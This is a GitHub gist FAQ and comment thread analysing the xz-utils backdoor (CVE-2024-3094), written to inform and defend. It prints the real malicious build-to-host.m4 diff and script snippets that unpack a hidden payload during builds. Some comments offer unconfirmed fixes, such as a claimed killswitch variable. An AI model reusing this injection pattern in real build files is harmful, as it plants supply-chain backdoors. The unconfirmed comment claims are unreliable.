Skip to content

Instantly share code, notes, and snippets.

@thesamesam
Last active December 21, 2024 19:38
Show Gist options
  • Save thesamesam/223949d5a074ebc3dce9ee78baad9e27 to your computer and use it in GitHub Desktop.
Save thesamesam/223949d5a074ebc3dce9ee78baad9e27 to your computer and use it in GitHub Desktop.
xz-utils backdoor situation (CVE-2024-3094)

FAQ on the xz-utils backdoor (CVE-2024-3094)

This is a living document. Everything in this document is made in good faith of being accurate, but like I just said; we don't yet know everything about what's going on.

Background

On March 29th, 2024, a backdoor was discovered in xz-utils, a suite of software that gives developers lossless compression. This package is commonly used for compressing release tarballs, software packages, kernel images, and initramfs images. It is very widely distributed, statistically your average Linux or macOS system will have it installed for convenience.

This backdoor is very indirect and only shows up when a few known specific criteria are met. Others may be yet discovered! However, this backdoor is at least triggerable by remote unprivileged systems connecting to public SSH ports. This has been seen in the wild where it gets activated by connections - resulting in performance issues, but we do not know yet what is required to bypass authentication (etc) with it.

We're reasonably sure the following things need to be true for your system to be vulnerable:

  • You need to be running a distro that uses glibc (for IFUNC)
  • You need to have versions 5.6.0 or 5.6.1 of xz or liblzma installed (xz-utils provides the library liblzma) - likely only true if running a rolling-release distro and updating religiously.

We know that the combination of systemd and patched openssh are vulnerable but pending further analysis of the payload, we cannot be certain that other configurations aren't.

While not scaremongering, it is important to be clear that at this stage, we got lucky, and there may well be other effects of the infected liblzma.

If you're running a publicly accessible sshd, then you are - as a rule of thumb for those not wanting to read the rest here - likely vulnerable.

If you aren't, it is unknown for now, but you should update as quickly as possible because investigations are continuing.

TL:DR:

  • Using a .deb or .rpm based distro with glibc and xz-5.6.0 or xz-5.6.1:
    • Using systemd on publicly accessible ssh: update RIGHT NOW NOW NOW
    • Otherwise: update RIGHT NOW NOW but prioritize the former
  • Using another type of distribution:
    • With glibc and xz-5.6.0 or xz-5.6.1: update RIGHT NOW, but prioritize the above.

If all of these are the case, please update your systems to mitigate this threat. For more information about affected systems and how to update, please see this article or check the xz-utils page on Repology.

This is not a fault of sshd, systemd, or glibc, that is just how it was made exploitable.

Design

This backdoor has several components. At a high level:

  • The release tarballs upstream publishes don't have the same code that GitHub has. This is common in C projects so that downstream consumers don't need to remember how to run autotools and autoconf. The version of build-to-host.m4 in the release tarballs differs wildly from the upstream on GitHub.
  • There are crafted test files in the tests/ folder within the git repository too. These files are in the following commits:
  • Note that the bad commits have since been reverted in e93e13c8b3bec925c56e0c0b675d8000a0f7f754
  • A script called by build-to-host.m4 that unpacks this malicious test data and uses it to modify the build process.
  • IFUNC, a mechanism in glibc that allows for indirect function calls, is used to perform runtime hooking/redirection of OpenSSH's authentication routines. IFUNC is a tool that is normally used for legitimate things, but in this case it is exploited for this attack path.

Normally upstream publishes release tarballs that are different than the automatically generated ones in GitHub. In these modified tarballs, a malicious version of build-to-host.m4 is included to execute a script during the build process.

This script (at least in versions 5.6.0 and 5.6.1) checks for various conditions like the architecture of the machine. Here is a snippet of the malicious script that gets unpacked by build-to-host.m4 and an explanation of what it does:

if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1);then

  • If amd64/x86_64 is the target of the build
  • And if the target uses the name linux-gnu (mostly checks for the use of glibc)

It also checks for the toolchain being used:

  if test "x$GCC" != 'xyes' > /dev/null 2>&1;then
  exit 0
  fi
  if test "x$CC" != 'xgcc' > /dev/null 2>&1;then
  exit 0
  fi
  LDv=$LD" -v"
  if ! $LDv 2>&1 | grep -qs 'GNU ld' > /dev/null 2>&1;then
  exit 0

And if you are trying to build a Debian or Red Hat package:

if test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64";then

This attack thusly seems to be targeted at amd64 systems running glibc using either Debian or Red Hat derived distributions. Other systems may be vulnerable at this time, but we don't know.

Lasse Collin, the original long-standing xz maintainer, is currently working on auditing the xz.git.

Design specifics

$ git diff m4/build-to-host.m4 ~/data/xz/xz-5.6.1/m4/build-to-host.m4
diff --git a/m4/build-to-host.m4 b/home/sam/data/xz/xz-5.6.1/m4/build-to-host.m4
index f928e9ab..d5ec3153 100644
--- a/m4/build-to-host.m4
+++ b/home/sam/data/xz/xz-5.6.1/m4/build-to-host.m4
@@ -1,4 +1,4 @@
-# build-to-host.m4 serial 3
+# build-to-host.m4 serial 30
 dnl Copyright (C) 2023-2024 Free Software Foundation, Inc.
 dnl This file is free software; the Free Software Foundation
 dnl gives unlimited permission to copy and/or distribute it,
@@ -37,6 +37,7 @@ AC_DEFUN([gl_BUILD_TO_HOST],
 
   dnl Define somedir_c.
   gl_final_[$1]="$[$1]"
+  gl_[$1]_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"`
   dnl Translate it from build syntax to host syntax.
   case "$build_os" in
     cygwin*)
@@ -58,14 +59,40 @@ AC_DEFUN([gl_BUILD_TO_HOST],
   if test "$[$1]_c_make" = '\"'"${gl_final_[$1]}"'\"'; then
     [$1]_c_make='\"$([$1])\"'
   fi
+  if test "x$gl_am_configmake" != "x"; then
+    gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
+  else
+    gl_[$1]_config=''
+  fi
+  _LT_TAGDECL([], [gl_path_map], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_prefix], [2])dnl
+  _LT_TAGDECL([], [gl_am_configmake], [2])dnl
+  _LT_TAGDECL([], [[$1]_c_make], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_config], [2])dnl
   AC_SUBST([$1_c_make])
+
+  dnl If the host conversion code has been placed in $gl_config_gt,
+  dnl instead of duplicating it all over again into config.status,
+  dnl then we will have config.status run $gl_config_gt later, so it
+  dnl needs to know what name is stored there:
+  AC_CONFIG_COMMANDS([build-to-host], [eval $gl_config_gt | $SHELL 2>/dev/null], [gl_config_gt="eval \$gl_[$1]_config"])
 ])
 
 dnl Some initializations for gl_BUILD_TO_HOST.
 AC_DEFUN([gl_BUILD_TO_HOST_INIT],
 [
+  dnl Search for Automake-defined pkg* macros, in the order
+  dnl listed in the Automake 1.10a+ documentation.
+  gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
+  if test -n "$gl_am_configmake"; then
+    HAVE_PKG_CONFIGMAKE=1
+  else
+    HAVE_PKG_CONFIGMAKE=0
+  fi
+
   gl_sed_double_backslashes='s/\\/\\\\/g'
   gl_sed_escape_doublequotes='s/"/\\"/g'
+  gl_path_map='tr "\t \-_" " \t_\-"'
 changequote(,)dnl
   gl_sed_escape_for_make_1="s,\\([ \"&'();<>\\\\\`|]\\),\\\\\\1,g"
 changequote([,])dnl

Payload

If those conditions check, the payload is injected into the source tree. We have not analyzed this payload in detail. Here are the main things we know:

  • The payload activates if the running program has the process name /usr/sbin/sshd. Systems that put sshd in /usr/bin or another folder may or may not be vulnerable.

  • It may activate in other scenarios too, possibly even unrelated to ssh.

  • We don't entirely know the payload is intended to do. We are investigating.

  • Successful exploitation does not generate any log entries.

  • Vanilla upstream OpenSSH isn't affected unless one of its dependencies links liblzma.

    • Lennart Poettering had mentioned that it may happen via pam->libselinux->liblzma, and possibly in other cases too, but...
    • libselinux does not link to liblzma. It turns out the confusion was because of an old downstream-only patch in Fedora and a stale dependency in the RPM spec which persisted long-beyond its removal.
    • PAM modules are loaded too late in the process AFAIK for this to work (another possible example was pam_fprintd). Solar Designer raised this issue as well on oss-security.
  • The payload is loaded into sshd indirectly. sshd is often patched to support systemd-notify so that other services can start when sshd is running. liblzma is loaded because it's depended on by other parts of libsystemd. This is not the fault of systemd, this is more unfortunate. The patch that most distributions use is available here: openssh/openssh-portable#375.

    • Update: The OpenSSH developers have added non-library integration of the systemd-notify protocol so distributions won't be patching it in via libsystemd support anymore. This change has been committed and will land in OpenSSH-9.8, due around June/July 2024.
  • If this payload is loaded in openssh sshd, the RSA_public_decrypt function will be redirected into a malicious implementation. We have observed that this malicious implementation can be used to bypass authentication. Further research is being done to explain why.

    • Filippo Valsorda has shared analysis indicating that the attacker must supply a key which is verified by the payload and then attacker input is passed to system(), giving remote code execution (RCE).

Tangential xz bits

  • Jia Tan's 328c52da8a2bbb81307644efdb58db2c422d9ba7 commit contained a . in the CMake check for landlock sandboxing support. This caused the check to always fail so landlock support was detected as absent.

    • Hardening of CMake's check_c_source_compiles has been proposed (see Other projects).
  • IFUNC was introduced for crc64 in ee44863ae88e377a5df10db007ba9bfadde3d314 by Hans Jansen.

    • Hans Jansen later went on to ask Debian to update xz-utils in https://bugs.debian.org/1067708, but this is quite a common thing for eager users to do, so it's not necessarily nefarious.

People

We do not want to speculate on the people behind this project in this document. This is not a productive use of our time, and law enforcement will be able to handle identifying those responsible. They are likely patching their systems too.

xz-utils had two maintainers:

  • Lasse Collin (Larhzu) who has maintained xz since the beginning (~2009), and before that, lzma-utils.
  • Jia Tan (JiaT75) who started contributing to xz in the last 2-2.5 years and gained commit access, and then release manager rights, about 1.5 years ago. He was removed on 2024-03-31 as Lasse begins his long work ahead.

Lasse regularly has internet breaks and was on one of these as this all kicked off. He has posted an update at https://tukaani.org/xz-backdoor/ and is working with the community.

Please be patient with him as he gets up to speed and takes time to analyse the situation carefully.

Misc notes

Analysis of the payload

This is the part which is very much in flux. It's early days yet.

These two especially do a great job of analysing the initial/bash stages:

Other great resources:

Other projects

There are concerns some other projects are affected (either by themselves or changes to other projects were made to facilitate the xz backdoor). I want to avoid a witch-hunt but listing some examples here which are already been linked widely to give some commentary.

Tangential efforts as a result of this incident

This is for suggesting specific changes which are being considered as a result of this.

Discussions in the wake of this

This is for linking to interesting general discussions, rather than specific changes being suggested (see above).

Non-mailing list proposals:

Acknowledgements

  • Andres Freund who discovered the issue and reported it to linux-distros and then oss-security.
  • All the hard-working security teams helping to coordinate a response and push out fixes.
  • Xe Iaso who resummarized this page for readability.
  • Everybody who has provided me tips privately, in #tukaani, or in comments on this gist.

Meta

Please try to keep comments on the gist constrained to editorial changes I need to make, new sources, etc.

There are various places to theorise & such, please see e.g. https://discord.gg/TPz7gBEE (for both, reverse engineering and OSint). (I'm not associated with that Discord but the link is going around, so...)

Response to questions

  • A few people have asked why Jia Tan followed me (@thesamesam) on GitHub. #tukaani was a small community on IRC before this kicked off (~10 people, currently has ~350). I've been in #tukaani for a few years now. When the move from self-hosted infra to github was being planned and implemented, I was around and starred & followed the new Tukaani org pretty quickly.

  • I'm referenced in one of the commits in the original oss-security post that works around noise from the IFUNC resolver. This was a legitimate issue which applies to IFUNC resolvers in general. The GCC bug it led to (PR114115) has been fixed.

    • On reflection, there may have been a missed opportunity as maybe I should have looked into why I couldn't hit the reported Valgrind problems from Fedora on Gentoo, but this isn't the place for my own reflections nor is it IMO the time yet.

TODO for this doc

  • Add a table of releases + signer?
  • Include the injection script after the macro
  • Mention detection?
  • Explain the bug-autoconf thing maybe wrt serial
  • Explain dist tarballs, why we use them, what they do, link to autotools docs, etc
    • "Explaining the history of it would be very helpful I think. It also explains how a single person was able to insert code in an open source project that no one was able to peer review. It is pragmatically impossible, even if technically possible once you know the problem is there, to peer review a tarball prepared in this manner."

TODO overall

Anyone can and should work on these. I'm just listing them so people have a rough idea of what's left.

  • Ensuring Lasse Collin and xz-utils is supported, even long after the fervour is over
  • Reverse engineering the payload (it's still fairly early days here on this)
    • Once finished, tell people whether:
      • the backdoor did anything else than waiting for connections for RCE, like:
        • call home (send found private keys, etc)
        • load/execute additional rogue code
        • did some other steps to infest the system (like adding users, authorized_keys, etc.) or whether it can be certainly said, that it didn't do so
      • other attack vectors than via sshd were possible
      • whether people (who had the compromised versions) can feel fully safe if they either had sshd not running OR at least not publicly accessible (e.g. because it was behind a firewall, nat, iptables, etc.)
  • Auditing all possibly-tainted xz-utils commits
  • Investigate other paths for sshd to get liblzma in its process (not just via libsystemd, or at least not directly)
    • This is already partly done and it looks like none exist, but it would be nice to be sure.
  • Checking other projects for similar injection mechanisms (e.g. similar build system lines)
  • Diff and review all "golden" upstream tarballs used by distros against the output of creating a tarball from the git tag for all packages.
  • Check other projecs which (recently) introduced IFUNC, as suggested by thegrugq.
    • This isn't a bad idea even outside of potential backdoors, given how brittle IFUNC is.
  • ???

References and other reading material

@innoseon
Copy link

If someone wants to do bad things, he will avoid a correct name.

@FrankHB
Copy link

FrankHB commented Mar 31, 2024

kill the autools, use meson (the philosophy of meson is : only what is in git should go to the dist, there is even no need for a release, just a tag)

Or take a step further: kill binary distro, use source for confidence, in all serious cases. Binaries are only cache. with no more attack surface.

This also prevents vendor lock-in. Consider when you have a compromised meson...

@ItzSwirlz
Copy link

I want to note - I'm not an expert or anything, but it seems the way of malware infections are now spread is not through cringy downloads from sketchy sites. It seems that attackers are now working towards infecting safe, regular files.

Example: Fractureiser was the result of a guy who compromised CurseForge accounts and injected code into Minecraft Mod JAR files that would then download a payload, and basically install hidden malware onto the system and sneakily hide itself in with similar names to other legit programs.

Here, although this was not account compromise, the idea of sneakily injecting and obfuscating malicious code to secretly do a payload, and then hide itself for a scary amount of time before tech-savvy people figure out something suspicious is going on.

This makes it easier for bad actors in many different ways - this solves the issue of users thinking "I couldn't have gotten a virus, I got it from a legitimate source!" and also solves the issue of being apparent malware that the user knows something is wrong. Instead it will just sit dormant and do its work, without ever having to reveal itself.

@sgammon
Copy link

sgammon commented Mar 31, 2024

There is a string embedded in the binary, as shown here:

https://gist.github.com/q3k/af3d93b6a1f399de28fe194add452d01#file-hashes-txt-L115

Which appears to function as a killswitch:

https://piaille.fr/@zeno/112185928685603910

In which case this backdoor may be rendered inert by adding the following to /etc/environment:

yolAbejyiejuvnup=Evjtgvsh5okmkAvj

@FrankHB
Copy link

FrankHB commented Mar 31, 2024

I want to note - I'm not an expert or anything, but it seems the way of malware infections are now spread is not through cringy downloads from sketchy sites. It seems that attackers are now working towards infecting safe, regular files.

Example: Fractureiser was the result of a guy who compromised CurseForge accounts and injected code into Minecraft Mod JAR files that would then download a payload, and basically install hidden malware onto the system and sneakily hide itself in with similar names to other legit programs.

Here, although this was not account compromise, the idea of sneakily injecting and obfuscating malicious code to secretly do a payload, and then hide itself for a scary amount of time before tech-savvy people figure out something suspicious is going on.

This makes it easier for bad actors in many different ways - this solves the issue of users thinking "I couldn't have gotten a virus, I got it from a legitimate source!" and also solves the issue of being apparent malware that the user knows something is wrong. Instead it will just sit dormant and do its work, without ever having to reveal itself.

Nothing new. For sake of security, FOSS always works as a PoW (proof of work) system: if you don't work hard enough to review all the code you use by yourself (to prove it is "secure" enough), they can be compromised for a long time. Sometimes there are even no bad actors at all, just plain old bugs, before you get some damage.

For anyone lacking of capability to audit the code, they have to make someone else to do the work. Blindly relying on the reputation of normal developers is also the trivial implementation of this strategy, and (ironically) it really works, just not well in cases like this one.

That's still better than a world of blobs everywhere, at least in the cost of identifying the risks (even not fixable).

@smokhov
Copy link

smokhov commented Mar 31, 2024

@ItzSwirlz -- this why this is gaining steam now for the supply chain attacks to target something that is very widely used; audits should be done based on more than just trust for all popular (and not) source code components, esp. libraries. CI/CD pipelines should offer such services by default on places like GitHub, GitLab, etc to developers free of charge. Like dependabot does here or other static scanners, should also vet release tarballs. But hard to prevent an insider going rogue like that guy I forgot for a popular node package did a couple of years ago... This is a real problem. Still glad this happened in the open and open source so it can be caught sooner than if say this same thing happens at a proprietary developed popular application from a private company without code open for audit.

@CodingWithAnxiety
Copy link

kill the autools, use meson (the philosophy of meson is : only what is in git should go to the dist, there is even no need for a release, just a tag)

Or take a step further: kill binary distro, use source for confidence, in all serious cases. Binaries are only cache. with no more attack surface.

This also prevents vendor lock-in. Consider when you have a compromised meson...

Dear god, what're you trying to do? Make linux unusable? We have gentoo for this which, by the way, was also affected by this XZ backdoor. "Make every distro compiled..."

You seem to forget not everyone has a top of the line CPU. God forbid you like google chrome or any proprietary software...

@lazyruss
Copy link

i have not checked v5.6.0 but in 5.6.1 build-to-host.m4 is not important. Script injection code is right in configure (at least in debian tarball).
"build-to-host":C) eval $gl_config_gt | $SHELL 2>/dev/null ;;

@thesamesam
Copy link
Author

thesamesam commented Mar 31, 2024

@lazyruss The variables which populate $gl_config_gt come from m4/build-to-host.m4. In general, M4 macros are used to populate configure. configure is a generated file and is the product of various other bits, including M4 macros.

@jsuelwald
Copy link

Or take a step further: kill binary distro, use source for confidence, in all serious cases. Binaries are only cache. with no more attack surface.

And this won't change anything as the source code was compromised itself.

@zacanger
Copy link

zacanger commented Mar 31, 2024

Or take a step further: kill binary distro, use source for confidence, in all serious cases. Binaries are only cache. with no more attack surface.

And this won't change anything as the source code was compromised itself.

It's also not a great idea. Source distribution sounds great, but I don't really want to waste 30 minutes buliding Firefox every time I update, and many package managers and Linux distributions can't afford build servers to manually reset, test checksums against the upstream repo, re-apply distro/package-manager-specific patches, and build.

From what I understand, this Gist and its comments are meant to be discussion of this specific issue, though (scroll to the top and read the TODOs). It might be useful to move all this other discussion, which has a lot of good ideas, somewhere else. There are good ideas in here that someone might want to work with, but a lot of them aren't relevant to figuring out the impact of this attack and mitigating it in the short term.

@AlexBaranowski
Copy link

AlexBaranowski commented Mar 31, 2024

btw, I see mention of W11, isn't there also WSL running debian and Ubuntus ? Any potential impact ?

If you've updated either recently, that included the affected packages, enabled systemd and ran sshd that was available openly then yes. But that's a very long stretch as systemd isn't even on by default in WSL.

THIS IS NOT TRUE! A LOT OF DISTROS INCLUDING UBUNTU RUN SYSTEMD BY DEFAULT IN WSL

How do I know that? I made a few distro packages for WSL, some of them even public :). Let's check the default Ubuntu on WSL2:

PS C:\Users\Alex> wsl -d Ubuntu
alex@citadel:/mnt/c/Users/Alex$ ps aux | head -2
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.2  0.0 165764 11260 ?        Ss   15:02   0:00 /sbin/init
alex@citadel:/mnt/c/Users/Alex$ ll /sbin/init
lrwxrwxrwx 1 root root 20 Sep 20  2023 /sbin/init -> /lib/systemd/systemd*
alex@citadel:/mnt/c/Users/Alex$ cat /etc/wsl.conf

[boot]
systemd=true

https://learn.microsoft.com/en-us/windows/wsl/systemd

@TyrHeimdalEVE @thesamesam @Z-nonymous The WSL systems might be vulnerable.

@timtas
Copy link

timtas commented Mar 31, 2024

btw, I see mention of W11, isn't there also WSL running debian and Ubuntus ? Any potential impact ?

If you've updated either recently, that included the affected packages, enabled systemd and ran sshd that was available openly then yes. But that's a very long stretch as systemd isn't even on by default in WSL.

THIS IS NOT TRUE! A LOT OF DISTROS INCLUDING UBUNTU RUN SYSTEMD BY DEFAULT IN WSL

How do I know that? I made a few distro packages for WSL, some of them even public :). Let's check the default Ubuntu on WSL2:

PS C:\Users\Alex> wsl -d Ubuntu
alex@citadel:/mnt/c/Users/Alex$ ps aux | head -2
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.2  0.0 165764 11260 ?        Ss   15:02   0:00 /sbin/init
alex@citadel:/mnt/c/Users/Alex$ ll /sbin/init
lrwxrwxrwx 1 root root 20 Sep 20  2023 /sbin/init -> /lib/systemd/systemd*
alex@citadel:/mnt/c/Users/Alex$ cat /etc/wsl.conf

[boot]
systemd=true

https://learn.microsoft.com/en-us/windows/wsl/systemd

@TyrHeimdalEVE @thesamesam @Z-nonymous The WSL systems might be vulnerable.

So what? Are we now starting to fix Microsoft's problems? Funny, where Linux stands now at the moment, as some kind of Microsoft Windows subsystem?

@TommyTran732
Copy link

btw, I see mention of W11, isn't there also WSL running debian and Ubuntus ? Any potential impact ?

If you've updated either recently, that included the affected packages, enabled systemd and ran sshd that was available openly then yes. But that's a very long stretch as systemd isn't even on by default in WSL.

THIS IS NOT TRUE! A LOT OF DISTROS INCLUDING UBUNTU RUN SYSTEMD BY DEFAULT IN WSL

How do I know that? I made a few distro packages for WSL, some of them even public :). Let's check the default Ubuntu on WSL2:

PS C:\Users\Alex> wsl -d Ubuntu
alex@citadel:/mnt/c/Users/Alex$ ps aux | head -2
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.2  0.0 165764 11260 ?        Ss   15:02   0:00 /sbin/init
alex@citadel:/mnt/c/Users/Alex$ ll /sbin/init
lrwxrwxrwx 1 root root 20 Sep 20  2023 /sbin/init -> /lib/systemd/systemd*
alex@citadel:/mnt/c/Users/Alex$ cat /etc/wsl.conf

[boot]
systemd=true

https://learn.microsoft.com/en-us/windows/wsl/systemd

@TyrHeimdalEVE @thesamesam @Z-nonymous The WSL systems might be vulnerable.

What version of xz-utils is in WSL though? On my normal Ubuntu Mantic VM it's still 5.4.x
Screenshot 2024-03-31 at 00 33 35

@TommyTran732
Copy link

btw, I see mention of W11, isn't there also WSL running debian and Ubuntus ? Any potential impact ?

If you've updated either recently, that included the affected packages, enabled systemd and ran sshd that was available openly then yes. But that's a very long stretch as systemd isn't even on by default in WSL.

THIS IS NOT TRUE! A LOT OF DISTROS INCLUDING UBUNTU RUN SYSTEMD BY DEFAULT IN WSL

How do I know that? I made a few distro packages for WSL, some of them even public :). Let's check the default Ubuntu on WSL2:

PS C:\Users\Alex> wsl -d Ubuntu
alex@citadel:/mnt/c/Users/Alex$ ps aux | head -2
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.2  0.0 165764 11260 ?        Ss   15:02   0:00 /sbin/init
alex@citadel:/mnt/c/Users/Alex$ ll /sbin/init
lrwxrwxrwx 1 root root 20 Sep 20  2023 /sbin/init -> /lib/systemd/systemd*
alex@citadel:/mnt/c/Users/Alex$ cat /etc/wsl.conf

[boot]
systemd=true

https://learn.microsoft.com/en-us/windows/wsl/systemd
@TyrHeimdalEVE @thesamesam @Z-nonymous The WSL systems might be vulnerable.

So what? Are we now starting to fix Microsoft's problems? Funny, where Linux stands now at the moment, as some kind of Microsoft Windows subsystem?

Not helpful man. What is wrong with you?

@zacanger
Copy link

zacanger commented Mar 31, 2024

What version of xz-utils is in WSL though? On my normal Ubuntu Mantic VM it's still 5.4.x

@TommyTran732 Last I checked (a few years ago) WSL just uses ther chosen distro's package repositories. So for Ubuntu, on everything except noble (24.04), it's 5.4 or 5.2. On noble it was at 5.6.1, but then re-released as 5.6.1+really5.4.5-1. Should be fine unless anyone was testing the upcoming release, or backporting packages.

@threefcata
Copy link

@Z-nonymous I find you very pretentious. On one hand you keep claiming 'this is not against China or Chinese', MEANWHILE, all your apparent genuine questions and reasonable doubts imply something so obvious that you keep denying. Stop even trying to fool everyone, do you think nobody sees what you are trying to get at?

@daniel-dona
Copy link

btw, I see mention of W11, isn't there also WSL running debian and Ubuntus ? Any potential impact ?

If you've updated either recently, that included the affected packages, enabled systemd and ran sshd that was available openly then yes. But that's a very long stretch as systemd isn't even on by default in WSL.

THIS IS NOT TRUE! A LOT OF DISTROS INCLUDING UBUNTU RUN SYSTEMD BY DEFAULT IN WSL

How do I know that? I made a few distro packages for WSL, some of them even public :). Let's check the default Ubuntu on WSL2:

PS C:\Users\Alex> wsl -d Ubuntu
alex@citadel:/mnt/c/Users/Alex$ ps aux | head -2
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.2  0.0 165764 11260 ?        Ss   15:02   0:00 /sbin/init
alex@citadel:/mnt/c/Users/Alex$ ll /sbin/init
lrwxrwxrwx 1 root root 20 Sep 20  2023 /sbin/init -> /lib/systemd/systemd*
alex@citadel:/mnt/c/Users/Alex$ cat /etc/wsl.conf

[boot]
systemd=true

https://learn.microsoft.com/en-us/windows/wsl/systemd
@TyrHeimdalEVE @thesamesam @Z-nonymous The WSL systems might be vulnerable.

So what? Are we now starting to fix Microsoft's problems? Funny, where Linux stands now at the moment, as some kind of Microsoft Windows subsystem?

Wasn't the initial reporter of the xz-utils backdoor a Microsoft developer? 🤨

@bwDraco
Copy link

bwDraco commented Mar 31, 2024

My Gentoo systems build xz-utils with Clang LTO. Does this circumvent the backdoor?

@githubuser6000
Copy link

@thesamesam Is there a way I can donate to the original maintainer?

@f00b4r0
Copy link

f00b4r0 commented Mar 31, 2024

@thesamesam dunno if this was mentioned before, but it's not clear from the current FAQ: systems NOT using systemd may still be affected, simply because libsystemd is installed. Case in point: Devuan, which does not use systemd init but still ships a Debian-patched sshd that links in libsystemd and loads liblzma.

https://pkginfo.devuan.org/cgi-bin/package-query.html?c=package&q=openssh-server=1:9.7p1-2+b1
https://pkginfo.devuan.org/cgi-bin/package-query.html?c=package&q=libsystemd0=255.4-1+b1

HTH

@leagris
Copy link

leagris commented Mar 31, 2024

What version of xz-utils is in WSL though? On my normal Ubuntu Mantic VM it's still 5.4.x <img alt="Screenshot 2024-03-31 at 00 33

dpkg-query -Wf '${package}\t${Version}\n' '*xz*'

@pillowtrucker
Copy link

@thesamesam dunno if this was mentioned before, but it's not clear from the current FAQ: systems NOT using systemd may still be affected, simply because libsystemd is installed. Case in point: Devuan, which does not use systemd init but still ships a Debian-patched sshd that links in libsystemd and loads liblzma.

https://pkginfo.devuan.org/cgi-bin/package-query.html?c=package&q=openssh-server=1:9.7p1-2+b1 https://pkginfo.devuan.org/cgi-bin/package-query.html?c=package&q=libsystemd0=255.4-1+b1

HTH

looool they bragged the whole day on twitter that they're immune to it because they don't have evil systemd but they're too stupid to know what the package they leeched off debian actually links against

@FlyingFathead
Copy link

FlyingFathead commented Mar 31, 2024

The release tarballs upstream publishes don't have the same code that GitHub has. This is common in C projects so that downstream consumers don't need to remember how to run autotools and autoconf. The version of build-to-host.m4 in the release tarballs differs wildly from the upstream on GitHub.

After my earlier comment on this yesterday and having slept on it, I no longer can't get past the thought of how this is a prime example of prioritizing convenience over secure practices. The fact that an attack like this can be "slipped in" just like that means that tarball tampering is going to be a target vector for supply chain attacks and other types of code tampering. Especially after this case, now that the cat's out of the bag, so to speak.

Repo tarballs should compare against the repo contents. Having a "single source of truth" for all components of the project is the idea. There is a dire need to ensure consistency between what developers see and work with in the repository and what end users receive in the tarball.

Whatever it introduces in terms of increased complexity, required automation and such, needs to be worked out. Include build tools in the tarball if need be, more robust integrity checks, automated consistency checks, transparent build processes, version-controlled release artifacts, reproducible builds, automated auditing, there's already multiple suggestions on this... perhaps that's a tall order, but right now, this attack implies that any project with a tarball out there might have literally anything in it. There's no other way to put it than the current practice showing a gaping security hole that overall enabled this exploit.

How can we be sure that this method of attack isn't already being utilized in other projects right now?

@gh-nate
Copy link

gh-nate commented Mar 31, 2024

@thesamesam: Hi, there are coordinated reverse engineering efforts ongoing on chat room(s) as discussed/posted under the linked Openwall oss-security mailing list thread. Is this worth a mention on your gist?

I refrained from posting the exact details here due to the risk of the low quality of the discussion spreading over.

@trip54654
Copy link

trip54654 commented Mar 31, 2024

IFUNC was added to enable this attack. Is IFUNC actually useful for anything legitimate? I know the attacker convinced glibc that it was, but... it's glibc, they love useless features that complicate everything.

Edit: and in particular, does IFUNC have the potential to reduce security by design?

@jgilbert2017
Copy link

jgilbert2017 commented Mar 31, 2024

(slightly off topic)
I have submitted a feature request to the c# package management system nuget to request support for publishing packages via source (git commit hash). Publishing is currently achieved via author signed binaries (oof).

Please see the issue below and voice your opinion on this if you have one.
NuGet/NuGetGallery#9889

We should take the lessons learned from this incident and apply them across the entire OSS ecosystem.

@jmakovicka
Copy link

jmakovicka commented Mar 31, 2024

IFUNC was added to enable this attack. Is IFUNC actually useful for anything legitimate? I know the attacker convinced glibc that it was, but... it's glibc, they love useless features that complicate everything.

They added CPU optimized CRC computation code, which served as a pretext for ifunc usage.

Similarly, the test infrastructure was created as a hideout for the malicious payload.

@AdrianBunk
Copy link

@smintrh78 I've responded there why your suggestion implies that you don't understand the problem.

@teyhouse
Copy link

I did some testing regarding detecting the CVE inside container images. As of right now, it seems the default container Scan from Trivy does not yet detect CVE-2024-3094, but grype does. I would recommend checking on SBOM-Base, for example:
https://github.com/teyhouse/CVE-2024-3094/blob/main/check_sbom.sh

image

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment